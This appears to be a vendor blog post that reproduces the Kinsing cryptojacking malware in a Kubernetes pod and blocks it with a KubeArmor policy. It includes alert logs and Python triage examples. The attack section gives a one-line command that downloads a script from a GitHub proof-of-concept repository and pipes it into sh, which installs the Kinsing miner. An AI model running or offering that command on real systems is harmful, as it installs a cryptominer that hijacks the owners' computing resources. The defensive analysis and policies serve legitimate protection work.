Crypto-hijacking (cryptojacking) and crypto-mining in K8s workloads are becoming increasingly common.

One such malware, which used an exposed Docker API port to infect a host and then attempted to spread to other containers on that host, is Kinsing. This malware runs a crypto-miner program inside the container, kills any other miners that are running, and removes traces of itself by making use of the cron service.

We’ll briefly walk through how the malware works and how we can effectively protect our containers from Kinsing using KubeArmor, an open-source runtime protection tool for cloud workloads from AccuKnox.

Learning the Attack Pattern

The Kinsing malware does several things from inside the container, which can be summarised as:

  1. Update the contents of the container using the package manager
  2. Install dependency software with the package manager
  3. Initiate a cron service
  4. Download and execute a shell script
  5. Tail /dev/null to keep the container running indefinitely

Kinsing Malware Workflow

Initiating the Attack

We will be using a Kinsing binary hosted on GitHub along with the shell script needed to initiate the attack. Kinsing serves as a carrier for the crypto-miner Kdevtmpfsi, which Kinsing creates and runs in the /tmp directory. Let us take a close look at the action.

Run the following command from an already-compromised Ubuntu container to initiate the attack:

apt-get update && apt-get install -y wget cron;service cron start;wget -q -O - https://raw.githubusercontent.com/vsk-coding/kinsing-poc/main/d.sh | sh;tail -f /dev/null

kubectl exec -it $(kubectl get po -lapp=frontend -o name | cut -c5-) -- bash -c "apt-get update && apt-get install -y wget cron;service cron start;wget -q -O - https://raw.githubusercontent.com/vsk-coding/kinsing-poc/main/d.sh | sh;tail -f /dev/null"

Once the container’s package lists are updated and the wget binary is installed, the shell script is downloaded and executed, which leads to the installation of Kinsing and the miner Kdevtmpfsi.

You will see output similar to this in your terminal once you execute the above command:

Let us take a look at the resource usage before and after the execution of the above commands:

kubectl top pod $(kubectl get po -lapp=frontend -o name | cut -c5-) --containers

Resource consumption before executing the shell script

kubectl top pod $(kubectl get po -lapp=frontend -o name | cut -c5-) --containers

Resource consumption after executing the shell script

The resource consumption increased to almost 19 times the initial values. On closer inspection, we could see that the Kinsing malware had been downloaded successfully and had started the miner agent Kdevtmpfsi.

Defending against the Attack

With some research, we were able to identify several common patterns the malware exhibits over the attack cycle:

  1. Launches the package manager to install its dependencies
  2. Kills all other crypto-mining processes and their cron jobs
  3. Removes files related to other crypto-miners
  4. Downloads the malware from the internet and stores it in the /var/tmp directory
  5. Executing the kinsing binary spawns a new process, Kdevtmpfsi, under the /tmp directory

Although no single suspicious event is enough to unveil a Kinsing attack completely, some of the patterns above are significant enough to draw the SOC team’s attention. So let’s talk about how KubeArmor can help defend against such an attack.
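The patterns above lend themselves to a simple correlation check: no indicator alone is conclusive, but several of them in the same container are. The following is an added example, not code from the original post or from KubeArmor, run over constructed process/file events in a hypothetical simplified (container, kind, path) shape; the indicator weights and the paging threshold are assumptions.

```python
import re
from collections import defaultdict

# Constructed events in a simplified, hypothetical (container, kind, path) shape, not
# KubeArmor's native alert schema. They follow the Kinsing steps listed above, plus one
# benign container that only ran a package manager.
EVENTS = [
    ("frontend/server", "Process", "/usr/bin/apt-get"),
    ("frontend/server", "Process", "/usr/sbin/cron"),
    ("frontend/server", "Process", "/usr/bin/wget"),
    ("frontend/server", "File", "/var/tmp/kinsing"),
    ("frontend/server", "Process", "/var/tmp/kinsing"),
    ("frontend/server", "Process", "/tmp/kdevtmpfsi"),
    ("web/nginx", "Process", "/usr/bin/apt-get"),
]

# One indicator per pattern, weighted by how suspicious it is on its own (weights and
# the threshold are this example's assumptions, not values from the post).
INDICATORS = [
    ("package manager", "Process", re.compile(r"^/usr/bin/(apt-get|apt|yum|apk)$"), 1),
    ("cron started", "Process", re.compile(r"^/usr/sbin/crond?$"), 1),
    ("downloader", "Process", re.compile(r"^/usr/bin/(wget|curl)$"), 1),
    ("write to /var/tmp", "File", re.compile(r"^/var/tmp/"), 2),
    ("exec from /var/tmp", "Process", re.compile(r"^/var/tmp/"), 3),
    ("exec from /tmp", "Process", re.compile(r"^/tmp/"), 3),
]
THRESHOLD = 5

def correlate(events):
    """Return {container: (score, [matched indicator names])}, each indicator counted once."""
    hits = defaultdict(lambda: (0, []))
    for container, kind, path in events:
        score, names = hits[container]
        for name, ind_kind, rx, weight in INDICATORS:
            if kind == ind_kind and rx.search(path) and name not in names:
                score, names = score + weight, names + [name]
        hits[container] = (score, names)
    return dict(hits)

def suspicious(events, threshold=THRESHOLD):
    """Containers whose combined indicators reach the threshold, in sorted order."""
    return sorted(c for c, (score, _) in correlate(events).items() if score >= threshold)
```

The benign container scores 1 for its package-manager run and stays below the threshold, while the container that walked through the whole chain scores 11.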

KubeArmor

KubeArmor is open-source software that enables you to protect your cloud workloads at runtime.

The problem KubeArmor solves is preventing cloud workloads from performing malicious activity at runtime. Malicious activity is any activity that the workload was not designed for or is not supposed to do.

Given a policy, KubeArmor can restrict the following types of behavior on your cloud workloads:

  • File access: allow or deny specific paths
  • Process execution and forking: allow or deny
  • Network connections: allow or deny establishing them
  • Capabilities: allow or deny the workload requesting additional capabilities from the host OS, since such capabilities can enable further types of malicious behaviour

Disabling the Kinsing Crypto Miner with KubeArmor

Armed with the knowledge about the malware above, we were able to block the Kinsing malware by enforcing a simple policy via KubeArmor. We’ve also pushed this policy to the KubeArmor repo so that you can use and apply it directly; it is available at this link. The policy is as follows:

apiVersion: security.kubearmor.com/v1
kind: KubeArmorPolicy
metadata:
  name: ksp-mitre-kinsing-cryptomining-malware-block
spec:
  message: "Incident! Kinsing crypto mining attack is Blocked"
  tags: ["MITRE", "T1496", "S0599", "MALWARE", "T1059.004", "T1059", "Crypto Mining", "CVE-2020-7961"]
  selector:
    matchLabels:
      app: frontend  # replace with the suspected pod's label
  process:
    severity: 1
    matchPaths:
      - path: /tmp/kdevtmpfsi
      - path: /var/tmp/kinsing
    action: Block
  file:
    severity: 2
    matchPaths:
      - path: /tmp/kdevtmpfsi
      - path: /var/tmp/kinsing
      - path: /tmp/zzz
    action: Audit

Coupled with KubeArmor, the policy makes sure that the kinsing and kdevtmpfsi binaries are not allowed to execute, and that any access to the kinsing, zzz, and kdevtmpfsi files at the listed paths is audited and alerted on.

The Policy in Action

You can simply take advantage of our open-source GitHub policy inventory and apply the policy directly from there:

kubectl apply -f https://raw.githubusercontent.com/kubearmor/policy-templates/main/mitre/system/ksp-mitre-kinsing-cryptomining-malware-block.yaml

Checking the pod’s resource usage before and after applying the policy:

kubectl top pod $(kubectl get po -lapp=frontend -o name | cut -c5-) --containers

Resource usage before applying the policy

kubectl top pod $(kubectl get po -lapp=frontend -o name | cut -c5-) --containers

Resource usage after applying the policy

Looking into the infected pod, we could see that most of the malware processes were <defunct>.

Checking the policy logs on KubeArmor

For how to do this, please go through our help section.

Audit Log Created by KubeArmor

{
  "timestamp": 1636461354,
  "updatedTime": "2021-11-09T12:35:54.980944Z",
  "hostName": "gke-test-10241-default-pool-9cf6a52a-f4s8",
  "namespaceName": "default",
  "podName": "frontend-594b5fb56f-7b7mg",
  "containerID": "575d32b8728c0d3ac166bf7a9c5bb2a443c92f6f963c81d8eb67e13b4bfef6fa",
  "containerName": "server",
  "hostPid": 920634,
  "ppid": 1,
  "pid": 1807,
  "uid": 0,
  "policyName": "ksp-mitre-kinsing-cryptomining-malware-block",
  "severity": "2",
  "tags": "MITRE,T1496,S0599,MALWARE,T1059.004,T1059,Crypto Mining,CVE-2020-7961",
  "message": "Incident! Kinsing crypto mining attack is Blocked",
  "type": "MatchedPolicy",
  "source": "/tmp/kdevtmpfsi",
  "operation": "File",
  "resource": "/tmp/kdevtmpfsi",
  "data": "syscall=SYS_OPEN flags=/sys/devices/system/cpu/online",
  "action": "Audit",
  "result": "Passed"
}

Blocked Log Created by KubeArmor

{
  "timestamp": 1636461518,
  "updatedTime": "2021-11-09T12:35:54.980944Z",
  "hostName": "gke-test-10241-default-pool-9cf6a52a-f4s8",
  "namespaceName": "default",
  "podName": "frontend-594b5fb56f-7b7mg",
  "containerID": "575d32b8728c0d3ac166bf7a9c5bb2a443c92f6f963c81d8eb67e13b4bfef6fa",
  "containerName": "server",
  "hostPid": 920634,
  "ppid": 1,
  "pid": 1807,
  "uid": 0,
  "policyName": "ksp-mitre-kinsing-cryptomining-malware-block",
  "severity": "1",
  "tags": "MITRE,T1496,S0599,MALWARE,T1059.004,T1059,Crypto Mining,CVE-2020-7961",
  "message": "Incident! Kinsing crypto mining attack is Blocked",
  "type": "MatchedPolicy",
  "source": "sh",
  "operation": "Process",
  "resource": "/tmp/kdevtmpfsi",
  "data": "syscall=SYS_EXECVE",
  "action": "Block",
  "result": "Permission denied"
}
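As an added example (not part of the original post or of the KubeArmor project), here is a small Python parser for alerts in the format shown above. Its input is constructed from the key fields of the two records (containerID shortened); it separates hits that were only audited from those actually denied, pulls the syscall out of the data field, and extracts the ATT&CK ids from the comma-separated tags.

```python
import json
from collections import defaultdict

# Two alert lines constructed in the shape of the KubeArmor alerts above (fields trimmed
# to those used here, containerID shortened); constructed input, not captured output.
_BASE = {"podName": "frontend-594b5fb56f-7b7mg", "containerID": "575d32b8728c", "pid": 1807,
         "policyName": "ksp-mitre-kinsing-cryptomining-malware-block", "type": "MatchedPolicy",
         "tags": "MITRE,T1496,S0599,MALWARE,T1059.004,T1059,Crypto Mining,CVE-2020-7961"}
ALERT_LINES = [json.dumps({**_BASE, **extra}) for extra in (
    {"severity": "2", "operation": "File", "source": "/tmp/kdevtmpfsi", "resource": "/tmp/kdevtmpfsi",
     "data": "syscall=SYS_OPEN flags=/sys/devices/system/cpu/online", "action": "Audit", "result": "Passed"},
    {"severity": "1", "operation": "Process", "source": "sh", "resource": "/tmp/kdevtmpfsi",
     "data": "syscall=SYS_EXECVE", "action": "Block", "result": "Permission denied"},
)]

def parse_alert(line):
    """Normalise one KubeArmor alert: split the CSV tags, pull the syscall out of `data`
    and record whether the event was actually denied or only audited."""
    a = json.loads(line)
    if a.get("type") != "MatchedPolicy":
        return None  # other KubeArmor record types are not policy hits
    tags = [t.strip() for t in a.get("tags", "").split(",") if t.strip()]
    data = dict(kv.split("=", 1) for kv in a.get("data", "").split() if "=" in kv)
    return {
        "pod": a["podName"], "container": a["containerID"], "pid": a["pid"],
        "policy": a["policyName"], "severity": int(a["severity"]),
        "operation": a["operation"], "resource": a["resource"], "syscall": data.get("syscall"),
        # ATT&CK technique / software ids in the tags look like T1496, T1059.004, S0599
        "attack_ids": [t for t in tags if t[:1] in "TS" and t[1:2].isdigit()],
        "enforced": a["action"] == "Block" and a["result"] == "Permission denied",
    }

def triage(lines):
    """Per (pod, policy): count audited vs blocked hits; collect pids, syscalls, ATT&CK ids."""
    out = defaultdict(lambda: {"audited": 0, "blocked": 0, "max_severity": 0,
                               "pids": set(), "syscalls": set(), "attack_ids": set()})
    for line in lines:
        a = parse_alert(line)
        if a is None:
            continue
        s = out[(a["pod"], a["policy"])]
        s["blocked" if a["enforced"] else "audited"] += 1
        s["max_severity"] = max(s["max_severity"], a["severity"])
        s["pids"].add(a["pid"])
        s["syscalls"].add(a["syscall"])
        s["attack_ids"].update(a["attack_ids"])
    return dict(out)
```

For the two records above this yields one audited file open and one blocked execve from the same pid, which is the signal a SOC analyst needs to tell "the policy fired" from "the policy actually stopped something".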

AccuKnox's policy templates repository

AccuKnox's policy-templates repository is an open-source repo that contains a wide range of attack-prevention policies, including MITRE-mapped ones, as well as hardening policies for your workloads. Please visit https://github.com/kubearmor/policy-templates to download and apply the policy templates.

Conclusion

The Kinsing malware exhibits a repetitive pattern during an attack, which yields a discoverable attack signature.

Without deep visibility into the process, file, and network activity of your cloud-native environment, and without the assistance of a keen discovery engine, it is difficult to identify such an attack or to uncover any such ongoing malicious activity.

By utilizing KubeArmor we were able to protect effectively against the Kinsing malware, and KubeArmor was also able to render the running malicious processes defunct.